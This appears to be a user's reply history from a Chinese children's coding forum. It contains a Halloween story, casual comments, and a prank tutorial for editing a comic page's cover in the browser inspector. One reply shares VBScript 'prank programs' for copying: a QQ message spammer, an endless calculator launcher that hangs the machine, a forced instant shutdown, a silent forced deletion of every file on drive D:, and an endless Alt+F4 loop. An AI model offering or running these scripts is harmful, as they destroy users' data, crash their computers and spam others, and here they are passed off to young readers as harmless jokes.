Lv.1
这个人一点都不懒,但他就是没写。
签名:要么写小说,要么逛百科,要么刷洛谷。要么做游戏,要么。。。。。。
在 【万圣节狂欢】看图编故事,想象力大PK 中回复
Once upon a time, there was an island in the world called "flying island".
In 2018 Halloween, codemao and Dan went out to have free sweets with their neighbors.
But they met a monster who wanted to eat them.Then flying island saved them.
So they are very happy on this day.
英语修改版如上,不要因为我用英语说我不爱国。
2018-11-03T21:36:41 点赞:0
在 【喵大会】你有什么秘密或者难言之隐吗?在这里和其他人做个交换吧 中回复
我上次想敲百度的网址,没想到敲错了,还敲进一个“18岁以下禁止观看”网站。。。。。。
2018-11-04T08:53:51 点赞:0
在 【每周精选·28】花样吃热狗,不来PK一下? 中回复
还有一个不是编程猫用户做的ut同人,叫狂妄之吔,根据bilibili某up主的鬼畜视频制作,感觉很好
2018-11-10T00:10:26 点赞:0
在 【编程几时休】突然想写easygui......(1) 中回复
网上搜集的一些喵程序
一、你打开好友的聊天对话框,然后记下在你QQ里好友的昵称,把下面代码里的xx替换一下,就可以自定义发送QQ信息到好友的次数(代码里的数字10改一下即可)。
------------------------------------------------------------------------------
On Error Resume Next
Dim wsh,ye
set wsh=createobject("wscript.shell")
for i=1 to 10
wscript.sleep 700
wsh.AppActivate("与 xx 聊天中")
wsh.sendKeys "^v"
wsh.sendKeys i
wsh.sendKeys "%s"
next
wscript.quit
二、打开无数个计算器,直到喵机
------------------------------------------------------------------------------
set wsh=createobject("wscript.shell")
do
wsh.run "calc"
loop
------------------------------------------------------------------------------
三、直接关机
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "shutdown -f -s -t 00",0 ,true
-----------------------------------------------------------------------------
四、删除D:\所有文件
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
----------------------------------------------------------------------------
五、不断按下alt+f4 (开什么都关闭)
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
while(1)
WSHshell.SendKeys "%{F4}"
loop
2018-11-14T20:14:49 点赞:0
在 【不正经的教程】#1:如何报复万年不更的作者 中回复
下下!你都三个月没更了!!!!再不更我要发大招了!!!!!!
好吧,还没更,气喵我也!看我大招!妈咪妈咪哄!
2018-11-14T20:24:07 点赞:0
在 【不正经的教程】#1:如何报复万年不更的作者 中回复
找到style="background-image:url(https://static.codemao.cn/comic/我家有只编程猫/cover_1503283242.jpg)
选中上面圈圈中括号内的链接,按Ctrl+C复制
2018-11-14T20:30:53 点赞:0
在 【不正经的教程】#1:如何报复万年不更的作者 中回复
新建一个网址栏,按Ctrl+V粘贴,然后进入,你会发现这本书的封面已经在这里啦!~
把他下载下来。
2018-11-14T20:32:31 点赞:0
在 【不正经的教程】#1:如何报复万年不更的作者 中回复
回到漫画栏,把style="background-image:url(https://static.codemao.cn/comic/我家有只编程猫/cover_1503283242.jpg)代码里红色的链接。
换成你复制的链接,大功告成!
2018-11-14T20:52:35 点赞:0
在 【不正经的教程】#1:如何报复万年不更的作者 中回复
同样,在标题上右键检查(或审查元素),把写有漫画标题字样的字改成你封面上写的恶搞标题,截屏发到社区里,让作者知道,拖更是多么的可怕!
别找了,我没法出去233
2018-11-14T20:56:45 点赞:0